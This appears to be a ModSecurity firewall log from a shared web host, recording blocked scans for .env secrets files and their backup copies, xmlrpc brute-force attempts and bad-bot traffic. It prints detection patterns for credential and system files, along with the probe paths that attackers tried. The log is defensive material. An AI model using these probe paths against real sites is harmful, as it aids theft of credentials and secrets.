[Tue May 26 15:00:15.270418 2026] [security2:error] [pid 662057:tid 662271] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVoJ_T3lMm9tGFVg9RedAAAAV4"]
[Tue May 26 15:00:15.273703 2026] [security2:error] [pid 662057:tid 662188] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahVoJ_T3lMm9tGFVg9ReeQAAAQs"]
[Tue May 26 15:00:15.276991 2026] [security2:error] [pid 662057:tid 662234] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahVoJ_T3lMm9tGFVg9RehAAAATk"]
[Tue May 26 15:00:15.437997 2026] [security2:error] [pid 662057:tid 662289] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoJvT3lMm9tGFVg9ReWwAAAXA"]
[Tue May 26 15:00:16.887902 2026] [security2:error] [pid 662057:tid 662292] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.production.copy"] [unique_id "ahVoKPT3lMm9tGFVg9ReuAAAAXM"]
[Tue May 26 15:00:17.227547 2026] [security2:error] [pid 662057:tid 662214] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.local.copy"] [unique_id "ahVoKfT3lMm9tGFVg9RexQAAASU"]
[Tue May 26 15:00:17.227651 2026] [security2:error] [pid 662057:tid 662216] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.local.bak"] [unique_id "ahVoKfT3lMm9tGFVg9RexgAAASc"]
[Tue May 26 15:00:17.232759 2026] [security2:error] [pid 662057:tid 662240] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.production.backup"] [unique_id "ahVoKfT3lMm9tGFVg9ReyQAAAT8"]
[Tue May 26 15:00:17.234894 2026] [security2:error] [pid 662057:tid 662192] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.local.orig"] [unique_id "ahVoKfT3lMm9tGFVg9ReygAAAQ8"]
[Tue May 26 15:00:17.235309 2026] [security2:error] [pid 662057:tid 662193] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.local.old"] [unique_id "ahVoKfT3lMm9tGFVg9Re0AAAARA"]
[Tue May 26 15:00:17.235439 2026] [security2:error] [pid 662057:tid 662262] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.orig"] [unique_id "ahVoKfT3lMm9tGFVg9ReywAAAVU"]
[Tue May 26 15:00:17.235639 2026] [security2:error] [pid 662057:tid 662304] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.production.old"] [unique_id "ahVoKfT3lMm9tGFVg9RezwAAAX8"]
[Tue May 26 15:00:17.236273 2026] [security2:error] [pid 662057:tid 662260] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.local.swp"] [unique_id "ahVoKfT3lMm9tGFVg9Re0gAAAVM"]
[Tue May 26 15:00:17.236486 2026] [security2:error] [pid 662057:tid 662279] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.local~"] [unique_id "ahVoKfT3lMm9tGFVg9Re0wAAAWY"]
[Tue May 26 15:00:17.236526 2026] [security2:error] [pid 662057:tid 662274] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.production.bak"] [unique_id "ahVoKfT3lMm9tGFVg9RezQAAAWE"]
[Tue May 26 15:00:17.237413 2026] [security2:error] [pid 662057:tid 662240] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.production.orig"] [unique_id "ahVoKfT3lMm9tGFVg9RezgAAAT8"]
[Tue May 26 15:00:17.237729 2026] [security2:error] [pid 662057:tid 662277] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahVoKfT3lMm9tGFVg9Re1QAAAWQ"]
[Tue May 26 15:00:17.238038 2026] [security2:error] [pid 662057:tid 662219] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.production.swp"] [unique_id "ahVoKfT3lMm9tGFVg9Re1AAAASo"]
[Tue May 26 15:00:17.240086 2026] [security2:error] [pid 662057:tid 662288] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahVoKfT3lMm9tGFVg9Re1gAAAW8"]
[Tue May 26 15:00:17.240519 2026] [security2:error] [pid 662057:tid 662263] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.copy"] [unique_id "ahVoKfT3lMm9tGFVg9Re1wAAAVY"]
[Tue May 26 15:00:17.240531 2026] [security2:error] [pid 662057:tid 662240] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.local.backup"] [unique_id "ahVoKfT3lMm9tGFVg9Re2AAAAT8"]
[Tue May 26 15:00:17.240702 2026] [security2:error] [pid 662057:tid 662253] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahVoKfT3lMm9tGFVg9Re2gAAAUw"]
[Tue May 26 15:00:17.240710 2026] [security2:error] [pid 662057:tid 662244] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.production~"] [unique_id "ahVoKfT3lMm9tGFVg9RezAAAAUM"]
[Tue May 26 15:00:17.242386 2026] [security2:error] [pid 662057:tid 662210] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahVoKfT3lMm9tGFVg9Re3AAAASE"]
[Tue May 26 15:00:17.244276 2026] [security2:error] [pid 662057:tid 662312] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahVoKfT3lMm9tGFVg9Re3QAAAYc"]
[Tue May 26 15:00:17.534910 2026] [security2:error] [pid 662057:tid 662227] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoKfT3lMm9tGFVg9RewwAAATI"]
[Tue May 26 15:00:17.784381 2026] [security2:error] [pid 662057:tid 662239] [client 195.178.110.34:43640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/local/.env"] [unique_id "ahVoKfT3lMm9tGFVg9Re7AAAAT4"]
[Tue May 26 15:00:20.314483 2026] [security2:error] [pid 662057:tid 662311] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoK_T3lMm9tGFVg9RfNwAAAYY"]
[Tue May 26 15:00:21.432022 2026] [security2:error] [pid 662057:tid 662286] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoLfT3lMm9tGFVg9RfWQAAAW0"]
[Tue May 26 15:00:21.970840 2026] [security2:error] [pid 662057:tid 662308] [client 61.246.190.186:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVoLfT3lMm9tGFVg9RfgAAAAYM"]
[Tue May 26 15:00:21.971345 2026] [security2:error] [pid 662057:tid 662247] [client 61.246.190.186:63924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/favicon.ico"] [unique_id "ahVoLfT3lMm9tGFVg9RffAAAAUY"]
[Tue May 26 15:00:22.171647 2026] [security2:error] [pid 662057:tid 662294] [client 81.22.193.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoLvT3lMm9tGFVg9RfhAAAAXU"], referer: https://www.anujtradingco.com/
[Tue May 26 15:00:22.305989 2026] [security2:error] [pid 662057:tid 662231] [client 61.246.190.186:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVoLvT3lMm9tGFVg9RflAAAATY"]
[Tue May 26 15:00:22.307381 2026] [security2:error] [pid 662057:tid 662222] [client 61.246.190.186:63924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/favicon.ico"] [unique_id "ahVoLvT3lMm9tGFVg9RfkQAAAS0"]
[Tue May 26 15:00:22.559053 2026] [security2:error] [pid 662057:tid 662232] [client 154.161.32.97:57085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoLvT3lMm9tGFVg9RfmQAAATc"]
[Tue May 26 15:00:22.559173 2026] [security2:error] [pid 662057:tid 662232] [client 154.161.32.97:57085] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoLvT3lMm9tGFVg9RfmQAAATc"]
[Tue May 26 15:00:23.370927 2026] [security2:error] [pid 662057:tid 662204] [client 81.22.193.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoL_T3lMm9tGFVg9RfxAAAARs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 15:00:23.872560 2026] [security2:error] [pid 662057:tid 662240] [client 64.233.173.227:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/index.php"] [unique_id "ahVoL_T3lMm9tGFVg9RfvQAAAT8"]
[Tue May 26 15:00:23.891470 2026] [security2:error] [pid 662057:tid 662280] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoL_T3lMm9tGFVg9Rf0AAAAWc"]
[Tue May 26 15:00:25.134821 2026] [security2:error] [pid 662057:tid 662281] [client 185.191.171.18:61160] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/day/2022-04-08/"] [unique_id "ahVoMfT3lMm9tGFVg9RgIAAAAWg"]
[Tue May 26 15:00:25.134973 2026] [security2:error] [pid 662057:tid 662281] [client 185.191.171.18:61160] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/day/2022-04-08/"] [unique_id "ahVoMfT3lMm9tGFVg9RgIAAAAWg"]
[Tue May 26 15:00:25.181514 2026] [security2:error] [pid 662057:tid 662233] [client 70.29.3.57:55793] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVoMPT3lMm9tGFVg9RgEAAAATg"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 15:00:25.324265 2026] [security2:error] [pid 662057:tid 662252] [client 195.178.110.34:37992] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/local/.env"] [unique_id "ahVoMfT3lMm9tGFVg9RgKwAAAUs"]
[Tue May 26 15:00:25.508374 2026] [security2:error] [pid 662057:tid 662253] [client 136.243.220.209:64881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoMfT3lMm9tGFVg9RgMAAAAUw"]
[Tue May 26 15:00:26.448975 2026] [security2:error] [pid 662057:tid 662306] [client 154.161.32.97:57086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoMvT3lMm9tGFVg9RgUQAAAYE"]
[Tue May 26 15:00:26.449103 2026] [security2:error] [pid 662057:tid 662306] [client 154.161.32.97:57086] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoMvT3lMm9tGFVg9RgUQAAAYE"]
[Tue May 26 15:00:27.556009 2026] [security2:error] [pid 662057:tid 662245] [client 81.22.193.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoM_T3lMm9tGFVg9RgewAAAUQ"], referer: https://anujtradingco.com
[Tue May 26 15:00:28.037759 2026] [security2:error] [pid 662057:tid 662249] [client 71.220.144.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahVoM_T3lMm9tGFVg9RgjAABSH4"]
[Tue May 26 15:00:28.122729 2026] [security2:error] [pid 662057:tid 662307] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoM_T3lMm9tGFVg9RghQAAAYI"]
[Tue May 26 15:00:28.128644 2026] [security2:error] [pid 662057:tid 662204] [client 123.21.186.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoM_T3lMm9tGFVg9RgigAAARs"]
[Tue May 26 15:00:28.949151 2026] [security2:error] [pid 662057:tid 662271] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoNPT3lMm9tGFVg9RgpwAAAV4"]
[Tue May 26 15:00:29.496183 2026] [security2:error] [pid 662057:tid 662248] [client 5.255.109.126:52926] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/.env"] [unique_id "ahVoNfT3lMm9tGFVg9RgzQAAAUc"]
